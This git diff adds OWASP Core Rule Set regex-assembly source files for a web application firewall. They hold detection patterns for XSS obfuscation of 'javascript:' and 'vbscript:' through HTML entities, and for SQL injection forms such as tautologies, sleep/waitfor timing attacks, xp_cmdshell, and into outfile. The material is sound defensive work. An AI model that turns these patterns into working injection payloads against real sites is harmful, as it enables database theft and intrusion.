&newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'javascript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_javascript +##!< + +##! all the possible ways to write 'j', plus whitespaces +##! canonical form +j +##! alternative forms +##!> assemble + ##! J 74 uppercase J + ##! j 106 lowercase j + ##! J 4A uppercase J (hex) + ##! j 6A lowercase j (hex) + {{html_entity_dec_prefix}}74; + {{html_entity_dec_prefix}}106; + {{html_entity_hex_prefix}}4A; + {{html_entity_hex_prefix}}6A; +##!< +##!=> +##!=> html_encoded_whitespace + +##! 
all the possible ways to write 'a', plus whitespaces +##!> assemble + ##! canonical form + a + ##! alternative forms + ##!> assemble + ##! A 65 uppercase A + ##! a 97 lowercase a + ##! A 41 uppercase A (hex) + ##! a 61 lowercase a (hex) + {{html_entity_dec_prefix}}65; + {{html_entity_dec_prefix}}97; + {{html_entity_hex_prefix}}41; + {{html_entity_hex_prefix}}61; + ##!< + ##!=> + ##!=> html_encoded_whitespace + ##!=< all_possible_ways_to_write_a +##!< + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! V 86 uppercase V + ##! V 56 uppercase V (hex) + ##! v 118 lowercase v + ##! v 76 lowercase v (hex) + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; + {{html_entity_dec_prefix}}118; + {{html_entity_hex_prefix}}76; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> all_possible_ways_to_write_a + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 67 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! 
R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_javascript diff --git a/nginx/config/owasp-crs/regex-assembly/941220.ra b/nginx/config/owasp-crs/regex-assembly/941220.ra new file mode 100644 index 00000000..1ecfe9e5 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941220.ra 
@@ -0,0 +1,212 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'vbscript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'v', then 'b', then 's', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + &newline; + ##!=> + ##!< + ##!=> + * + ##!=< html_encoded_whitespace +##!< + +##! all the possible ways to end the word 'vbscript', plus whitespaces +##!> assemble + ##! canonical form + : + ##! alternative forms + ##!> assemble + ##! 58 : colon + ##! 3A : colon (hex) + {{html_entity_dec_prefix}}58;? + {{html_entity_hex_prefix}}3A;? + : + ##!< + ##!=> + . + ##!=< end_vbscript +##!< + +##!=> +##! all the possible ways to write 'v', plus whitespaces +##! canonical form +v +##! alternative forms +##!> assemble + ##! v 86 lowercase v + ##! v 56 lowercase v (hex) + ##! V 83 uppercase V + ##! V 53 uppercase V (hex) + {{html_entity_dec_prefix}}86; + {{html_entity_hex_prefix}}56; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! 
all the possible ways to write 'b', plus whitespaces +##! canonical form +b +##! alternative forms +##!> assemble + ##! b 62 lowercase b + ##! b 98 lowercase b (hex) + ##! B 66 uppercase B + ##! B 42 uppercase B (hex) + {{html_entity_dec_prefix}}62; + {{html_entity_hex_prefix}}98; + {{html_entity_dec_prefix}}66; + {{html_entity_hex_prefix}}42; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 's', plus whitespaces +##! canonical form +s +##! alternative forms +##!> assemble + ##! s 115 lowercase s + ##! s 73 lowercase s (hex) + ##! S 83 uppercase S + ##! S 53 uppercase S (hex) + {{html_entity_dec_prefix}}115; + {{html_entity_hex_prefix}}73; + {{html_entity_dec_prefix}}83; + {{html_entity_hex_prefix}}53; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'c', plus whitespaces +##! canonical form +c +##! alternative forms +##!> assemble + ##! c 67 lowercase C (hex) + ##! c 99 lowercase c + ##! C 43 uppercase c (hex) + ##! C 67 uppercase C + {{html_entity_hex_prefix}}63; + {{html_entity_dec_prefix}}99; + {{html_entity_hex_prefix}}43; + {{html_entity_dec_prefix}}67; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'r', plus whitespaces +##! canonical form +r +##! alternative forms +##!> assemble + ##! r 72 lowercase R (hex) + ##! r 114 lowercase r + ##! r 52 uppercase r (hex) + ##! R 82 uppercase R + {{html_entity_hex_prefix}}72; + {{html_entity_dec_prefix}}114; + {{html_entity_hex_prefix}}52; + {{html_entity_dec_prefix}}82; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'i', plus whitespaces +##! canonical form +i +##! alternative forms +##!> assemble + ##! i 69 lowercase i (hex) + ##! i 105 lowercase i + ##! I 49 uppercase i (hex) + ##! 
I 73 uppercase I + {{html_entity_hex_prefix}}69; + {{html_entity_dec_prefix}}105; + {{html_entity_hex_prefix}}49; + {{html_entity_dec_prefix}}73; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 'p', plus whitespaces +##! canonical form +p +##! alternative forms +##!> assemble + ##! p 70 lowercase p (hex) + ##! p 112 lowercase p + ##! P 50 uppercase p (hex) + ##! P 80 uppercase P + {{html_entity_hex_prefix}}70; + {{html_entity_dec_prefix}}112; + {{html_entity_hex_prefix}}50; + {{html_entity_dec_prefix}}80; +##!< +##!=> +##!=> html_encoded_whitespace + +##!=> + +##! all the possible ways to write 't', plus whitespaces +##! canonical form +t +##! alternative forms +##!> assemble + ##! t 74 lowercase t (hex) + ##! t 116 lowercase t + ##! T 54 uppercase t (hex) + ##! T 84 uppercase T + {{html_entity_hex_prefix}}74; + {{html_entity_dec_prefix}}116; + {{html_entity_hex_prefix}}54; + {{html_entity_dec_prefix}}84; +##!< +##!=> +##!=> html_encoded_whitespace +##!=> + +##!=> end_vbscript diff --git a/nginx/config/owasp-crs/regex-assembly/941390.ra b/nginx/config/owasp-crs/regex-assembly/941390.ra new file mode 100644 index 00000000..92288915 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941390.ra @@ -0,0 +1,16 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \s*\( + +eval +settimeout +setinterval +new\s+Function +alert +atob +btoa +prompt +confirm diff --git a/nginx/config/owasp-crs/regex-assembly/942120.ra b/nginx/config/owasp-crs/regex-assembly/942120.ra new file mode 100644 index 00000000..f12014ed --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942120.ra 
@@ -0,0 +1,37 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\!\=
+\&\&
+\|\|
+>>
+<<
+>=
+<=
+<>
+<=>
+\bxor\b
+\bregexp\b
+regexp\s+binary
+\bisnull\b
+\brlike\b
+rlike\s+binary
+not\s+between\s+0\s+and
+not\s+between\s+(?:(?:'[^']*')|(?:\"[^\"]*\"))\s+and\s+(?:(?:'[^']*')|(?:\"[^\"]*\"))
+is\s+null
+like\s+null
+^in[+\s]*\([\s\d\"]+[^()]*\)
+\Win[+\s]*\([\s\d\"]+[^()]*\)
+<>\s+binary
+\bcollate\W*?(?:U&)?[\"'`]
+\bcollate\W+(?:binary|nocase|rtrim)\b
+\bcollate\W+\w*?_
+\bnotnull\b
+like\s+[\w]+\s+escape\b
+\bilike\b
+[<>=!]{1,2}\s*all\b
+\blikelihood\s*\(
+\bunlikely\s*\(
+\blikely\s*\(
diff --git a/nginx/config/owasp-crs/regex-assembly/942130.ra
new file mode 100644
index 00000000..66beb373
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942130.ra
@@ -0,0 +1,42 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! General comments:
+##!
+##! The idea behind this expressions is to capture simple logic based (un)equalities that
+##! are used to quickly test SQL Logic that always returns TRUE (hence the term "SQL Tautology").
+
+##! We also want to capture the left and right side, and compare for equality.
+##! That's why you see below that some of the patterns include grouping explicitly
+
+##! Prefix: captures the initial part that will be matched on the right hand side of the logical construct.
+
+##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?
+
+##! These expressions try to match the logic using the operator,
+##! so when the operator targets a TRUE operation, the initial match
+##! should be present after the operator, logically meaning TRUE
+##!
+##! Examples:
+##! '1' = '1'
+##! 'f' like 'f'
+
+##! This one will also match the "equal" part of '<=' and '>='
+=[\s'\"`()]*?\b([\d\w]+)\b
+
+##! <=> NULL-safe equal to operator in MySQL
+<=>[\s'\"`()]*?\b([\d\w]+)\b
+
+##! Like queries allow you to use wilcards: '%'
+
+like[\s'\"`()]*?\b([\d\w]+)\b
+sounds\s+like[\s'\"`()]*?\b([\d\w]+)\b
+
+##! GLOB operator is used to match text values against a pattern
+glob[\s'\"`()]*?\b([\d\w]+)\b
+
+##! String based regexp. These don't use % as wildcard.
+rlike[\s'\"`()]*?\b([\d\w]+)\b
+regexp[\s'\"`()]*?\b([\d\w]+)\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942131.ra
new file mode 100644
index 00000000..d4ebdfd9
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942131.ra
@@ -0,0 +1,42 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+
+##! General comments:
+##!
+##! The idea behind this expressions is to capture simple logic based (un)equalities that
+##! are used to quickly test SQL Logic that always returns FALSE.
+
+##! Prefix: captures the initial part that will be unmatched on the right hand side of the logical construct.
+
+##!^ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?
+
+##!+ i
+
+##! These expressions try to match the logic using the negative operator,
+##! so when the operator targets a false operation, the initial match
+##! should *not* be present after the operator, effectively meaning TRUE.
+##!
+##! Examples:
+##! '1' <= '2'
+##! 'a' not like 'b'
+##!
+##! SQL Comparison Operators: !=, <=, >=, <>, <, >, !>, !<, ^
+
+\!=[\s'\"`()]*?\b([\d\w]+)\b
+<>[\s'\"`()]*?\b([\d\w]+)\b
+<[\s'\"`()]*?\b([\d\w]+)\b
+\!<[\s'\"`()]*?\b([\d\w]+)\b
+>[\s'\"`()]*?\b([\d\w]+)\b
+\!>[\s'\"`()]*?\b([\d\w]+)\b
+<=[\s'\"`()]*?\b([\d\w]+)\b
+>=[\s'\"`()]*?\b([\d\w]+)\b
+\^[\s'\"`()]*?\b([\d\w]+)\b
+
+is\s+not[\s'\"`()]*?\b([\d\w]+)\b
+not\s+like[\s'\"`()]*?\b([\d\w]+)\b
+
+##! String based regexp.
+
+not\s+rlike[\s'\"`()]*?\b([\d\w]+)\b
+not\s+regexp[\s'\"`()]*?\b([\d\w]+)\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942140.ra
new file mode 100644
index 00000000..cd2551af
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942140.ra
@@ -0,0 +1,31 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+##!^ \b
+
+database\W*\(
+db_name\W*\(
+information_schema\b
+master\.\.sysdatabases\b
+msdb\b
+msysaccessobjects\b
+msysaccessstorage\b
+msysaccessxml\b
+msysaces\b
+msysmodules2\b
+msysmodules\b
+msysobjects\b
+msysqueries\b
+msysrelationships\b
+mysql\.db\b
+northwind\b
+pg_catalog\b
+pg_toast\b
+schema_name\b
+schema\W*\(
+sqlite_master\b
+sqlite_temp_master\b
+sysaux\b
+sys\.database_name\b
+tempdb\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942150.ra
new file mode 100644
index 00000000..aaaf7ce8
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942150.ra
@@ -0,0 +1,146 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ \b +##!$ \W*\( + +##! SQLite specific functions +json +json_[\w]+ +##! Extracted from docs with: +##! paths=("lang_corefunc.html" "lang_mathfunc.html" "lang_aggfunc.html"); declare items; for path in "${paths[@]}"; do items+=$(curl https://www.sqlite.org/$path -s | xmllint --html --xpath "//a[contains(@href,'func.html')]/text()" - 2>/dev/null | grep --color=never -Po "^[\w]+(?=\()"); done; echo "$items" | sort | uniq +abs +acos +acosh +asin +asinh +atan +atan2 +atanh +ceil +ceiling +changes +char +coalesce +cos +cosh +count +degrees +exp +floor +flooravg +format +glob +group_concat +hex +ifnull +iif +instr +last_insert_rowid +length +like +likelihood +likely +ln +load_extension +log +log10 +log2 +lower +lowerpi +ltrim +max +min +mod +nullif +pi +pow +power +printf +quote +radians +random +randomblob +replace +round +rtrim +sign +sin +sinh +soundex +sqlite_compileoption_get +sqlite_compileoption_used +sqlite_offset +sqlite_source_id +sqlite_version +sqrt +substr +substring +sum +tan +tanh +total +total_changes +trim +trunc +typeof +unicode +unlikely +upper +zeroblob + +##! Generic SQL functions +##! +##! Note: May contain overlap with the generated DBMS specific lists, but this guarantees +##! A minimum level of protection, even if one of the one-liners creates an unusual set. +##! Duplicates do not effect the final result of regexp-assemble. +abs +acos +avg +bin +cast +count +date +day +default +field +floor +format +hour +char +charset +chr +if +in +last +length +ln +local +log +max +min +minute +mod +month +now +password +pi +power +repeat +replace +reverse +right +round +second +sign +sleep +sum +tan +time +upper +user +values +version +week +year diff --git a/nginx/config/owasp-crs/regex-assembly/942151.ra b/nginx/config/owasp-crs/regex-assembly/942151.ra new file mode 100644 index 00000000..611a28a1 --- /dev/null 
+++ b/nginx/config/owasp-crs/regex-assembly/942151.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-function-names
diff --git a/nginx/config/owasp-crs/regex-assembly/942152.ra
new file mode 100644
index 00000000..611a28a1
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942152.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-function-names
diff --git a/nginx/config/owasp-crs/regex-assembly/942170.ra
new file mode 100644
index 00000000..6a24a484
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942170.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define one_or_more_whitespace \s+
+##!> define select_or_terminate (?:select|;){{one_or_more_whitespace}}
+
+##!> assemble
+
+ ##! benchmark may be used to time how quickly MySQL processes the expression
+ {{select_or_terminate}}benchmark
+
+ ##! conditional select
+ {{select_or_terminate}}if
+
+ ##! sleep function
+ {{select_or_terminate}}sleep
+ ##!=>
+
+ ##! function parameters
+ \s*?\(\s*?\(?\s*?\w+
+
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/942180.ra
new file mode 100644
index 00000000..d684e706
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942180.ra
@@ -0,0 +1,62 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define open-comment (?:/\*) +##!> define quotes [\"'`] +##!> define quotes-plus-digits [\d\"'`] +##!> define comment-suffix (?:--|#|{{open-comment}}|\{) +##! PB: Should comment-suffix also include "\*/" ? + +##!> define logical-operators or|xor|and +##!> define math-operators div +##!> define comparison-operators like|between +##!> define math-symbols [+<>=(),-] + +{{open-comment}}+{{quotes}}+\s?{{comment-suffix}}? + +##!> assemble + {{quotes}}\s* + ##!=> + ##! logical operators + or + xor + and + + ##! math operators + div + + ##! comparison operators + like + between + ##!=> + [\w\s-]+{{math-symbols}}\s*{{quotes-plus-digits}} + ##!=> +##!< + + +##!> assemble + {{quotes}} + ##!=> + [<>~]+ + \s*[^\w\s]?=\s* + \W*?[+=]+\W*? + ##!=> + {{quotes}} +##!< + +##!> assemble + {{quotes}} + ##!=> + \s*[!=|][\d\s!=+-]+.*?[\"'`(].*?$ + \s*[!=|][\d\s!=]+.*?\d+$ + \s*(?:like|print)\W+[\w\"'`(] + \s*; +##!< + +\d{{quotes}}\s+{{quotes}}\s+\d +^admin\s*?{{quotes}} +[\"'`\(\s]\s*?glob\W+[\w\"'`(] +\sis\s*?0\W +where\s[\s\w\.,-]+\s= diff --git a/nginx/config/owasp-crs/regex-assembly/942190.ra b/nginx/config/owasp-crs/regex-assembly/942190.ra new file mode 100644 index 00000000..9353b13d --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942190.ra 
@@ -0,0 +1,61 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define quotes [\"'`] + +##!> assemble + {{quotes}} + ##!=> + \s*!\s*[\"'`\w] + ##!> assemble + ;?\s* + ##!=> + having + select + ##!> assemble + union\b\s* + ##!=> + all + distinct + select + ##!< + ##!=> + \b\s*[^\s] + ##!< +##!< + +##!> assemble + \b + ##!=> + ##!> assemble + connection_id + current_user + database + schema + user + ##!=> + \s*?\( + ##!< + + exec\s+master\. + execute\s+master\. + from\W+information_schema\W + ##!> assemble + into[\s+]+ + ##!=> + dumpfile + outfile + ##!=> + \s*?{{quotes}} + ##!< + + select.*?\w?user\( + union\sselect\s@ + union[\w(\s]*?select +##!< + +\s*?exec.*?\Wxp_cmdshell +\s*?execute.*?\Wxp_cmdshell +\Wiif\s*?\( diff --git a/nginx/config/owasp-crs/regex-assembly/942200.ra b/nginx/config/owasp-crs/regex-assembly/942200.ra new file mode 100644 index 00000000..0d0c35dd --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942200.ra @@ -0,0 +1,40 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define punctuation-hexnumbers ,.*?[)\da-f\"'`] + +##!> define ticks [\"'`] + +##!> define spaces \s*?\(\s*?space\s*?\( + +##! Main assembly +##!> assemble + {{punctuation-hexnumbers}}{{ticks}} + ##!=> + {{ticks}}.*?{{ticks}} + (?:\r?\n)?\z + [^\"'`]+ + ##!=> +##!< + +\Wselect.+\W*?from + +##!> assemble + alter + create + delete + desc + drop + insert + load + rename + select + truncate + update + ##!=> + {{spaces}} + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942210.ra b/nginx/config/owasp-crs/regex-assembly/942210.ra new file mode 100644 index 00000000..dfad3266 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942210.ra 
@@ -0,0 +1,109 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Looking for patterns like: +##! between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] + +##!> assemble + && + \|\| + and + between + div + like + nand + not + or + xor + xxor + ##!=> + + [\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +##!< + + +##! Looking for patterns like: +##! \d\s*?between\s*?\d+\s*?[\-+] + +##!> assemble + \d\s*? + ##!=> + + and + between + div + like + or + xor + ##!=> + + \s*?\d+\s*?[\-+] +##!< + +##! Looking for a variation of the pattern above: +\d\s+group\s+by.+\( + + +##! Looking for patterns like: +##! \/\w+;?\s+between\W + +##!> assemble + \/\w+;?\s+ + ##!=> + + and + between + div + having + like + or + select + xor + ##!=> + + \W +##!< + + +##! Looking for patterns like: +##! ;\s*?drop +##! #\s*?alter +##! --\s*?drop + +##!> assemble + ;\s*? + #\s*? + --\s*? + ##!=> + + alter + drop + ##!=> +##!< + + +##! Looking for patterns like: +##! ;\s*?update\s*?\w{2,} +##! #\s*?insert\s*?\w{2,} +##! --\s*?update\s*?\w{2,} + +##!> assemble + ;\s*? + #\s*? + --\s*? + ##!=> + + insert + update + ##!=> + + \s*?\w{2,} + ##!=> +##!< + + +##! Looking for these unique patterns: +@.+=\s*?\(\s*?select +[^\w]SET\s*?@\w+ diff --git a/nginx/config/owasp-crs/regex-assembly/942230.ra b/nginx/config/owasp-crs/regex-assembly/942230.ra new file mode 100644 index 00000000..7c0dafd0 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942230.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +[\s()]case\s+when.*?then +\)\s*?like\s*?\( +select.*?having\s*?[^\s]+\s*?[^\w\s] +if\s?\(\w+\s*?[=<>~] diff --git a/nginx/config/owasp-crs/regex-assembly/942240.ra b/nginx/config/owasp-crs/regex-assembly/942240.ra new file mode 100644 index 00000000..fd42ddd1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942240.ra 
@@ -0,0 +1,32 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+##!> define alter alter\s*?\w+.*?
+
+##!> define set \s+set\s+\w+
+
+##!> define ticks [\"'`]
+
+##!> define waitfor \s*?waitfor\s+
+
+##! Main assembly
+##!> assemble
+ {{alter}}
+ ##!=>
+ char
+ character
+ ##!=>
+ {{set}}
+##!<
+
+##!> assemble
+ {{ticks}}
+ ##!=>
+ ;*?{{waitfor}}time\s+[\"'`]
+ ;*?{{waitfor}}delay\s+[\"'`]
+ ;.*?:\s*?goto
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/942260.ra
new file mode 100644
index 00000000..10fa4766
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942260.ra
@@ -0,0 +1,31 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define quotes [\"'`]
+
+
+##!> assemble
+ {{quotes}}\s*?
+ ##!=>
+ and
+ nand
+ or
+ xor
+ xxor
+ div
+ like
+ between
+ not
+ \|\|
+ &&
+ ##!=>
+ \s+[\s\w]+=\s*?\w+\s*?having\s+
+ ##!=>
+##!<
+
+\w\s+like\s+{{quotes}}
+like\s*?{{quotes}}\%
+{{quotes}}\s*?like\W*?[\"'`\d]
+select\s+?[\[\]()\s\w\.,\"'`-]+from\s+
diff --git a/nginx/config/owasp-crs/regex-assembly/942280.ra
new file mode 100644
index 00000000..0d07e85b
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942280.ra
@@ -0,0 +1,20 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define optional_whitespace \s*?
+
+##! The following part is going to be appended
+##! to match the end of a query or a comment syntax
+##!> define terminators (?:[#;{]|\/\*|--)
+
+##! In PostgreSQL, you can use the pg_sleep() function
+##! to delay execution for a given number of seconds
+select{{optional_whitespace}}pg_sleep
+
+##! WAITFOR DELAY blocks the execution until a time interval elapses
+waitfor{{optional_whitespace}}delay\s?[\"'`]+\s?\d
+
+##! SHUTDOWN immediately stops SQL Server
+;{{optional_whitespace}}shutdown{{optional_whitespace}}{{terminators}}
diff --git a/nginx/config/owasp-crs/regex-assembly/942290.ra
new file mode 100644
index 00000000..2966c2ee
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942290.ra
@@ -0,0 +1,41 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> define operator_syntax_start \[?\$
+##!> define operator_syntax_end \]?
+
+##!> assemble
+ {{operator_syntax_start}}
+ ##!=>
+ ne
+ eq
+ lt
+ lte
+ ni
+ nin
+ mod
+ all
+ size
+ exists
+ type
+ slice
+ or
+ xor
+ nor
+ div
+ like
+ between
+ and
+ nor
+ not
+ regex
+ text
+ where
+ jsonSchema
+ elemMatch
+ ##!=>
+ {{operator_syntax_end}}
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/942300.ra
new file mode 100644
index 00000000..bf427521
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942300.ra
@@ -0,0 +1,60 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define required-spaces-plus-sql-function-call \s+\w+\( +##!> define quotes [\"'`] +##!> define start-comment \/\*! +##!> define lazy-optional-spaces \s*? +##!> define lazy-optional-spaces-with-numbers {{lazy-optional-spaces}}\d+{{lazy-optional-spaces}} +##!> define lazy-optional-spaces-numeric-function-call {{lazy-optional-spaces}}\({{lazy-optional-spaces}}\d +##!> define lazy-optional-spaces-plus-sql-function-call {{lazy-optional-spaces}}\w+\( + +\){{lazy-optional-spaces}}when{{lazy-optional-spaces-with-numbers}}then + +##!> assemble + {{quotes}}{{lazy-optional-spaces}} + ##!=> + # + -- + { +##!< + +{{start-comment}}\s?\d+ + +##!> assemble + \b + ##!=> + + ##!> assemble + binary + char + chr + ##!=> + {{lazy-optional-spaces-numeric-function-call}} + ##!< + + ##!> assemble + and + nand + or + xor + xxor + div + like + between + not + regexp + rlike + ##!=> + {{required-spaces-plus-sql-function-call}} + ##!< +##!< + +##!> assemble + \|\| + && + ##!=> + {{lazy-optional-spaces-plus-sql-function-call}} +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942310.ra b/nginx/config/owasp-crs/regex-assembly/942310.ra new file mode 100644 index 00000000..2040b9e3 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942310.ra @@ -0,0 +1,19 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\(\s*?select\s*?\w+\s*?\( +\*\/from +\+\s*?\d+\s*?\+\s*?@ +\w[\"'`]\s*?(?:[-+=|@]+\s+?)+[\d(] +\w[\"'`]\s*?[-+=|@]+[\d(] +coalesce\s*?\( +@@\w+\s*?[^\w\s] +\W!+[\"'`]\w +[\"'`];\s*?if +[\"'`];\s*?while +[\"'`];\s*?begin +[\"'`][\s\d]+=\s*?\d +order\s+by\s+if\w*?\s*?\( +[\s(]+case\d*?\W.+[tw]hen[\s(] diff --git a/nginx/config/owasp-crs/regex-assembly/942320.ra b/nginx/config/owasp-crs/regex-assembly/942320.ra new file mode 100644 index 00000000..c19b5fa7 --- /dev/null 
+++ b/nginx/config/owasp-crs/regex-assembly/942320.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
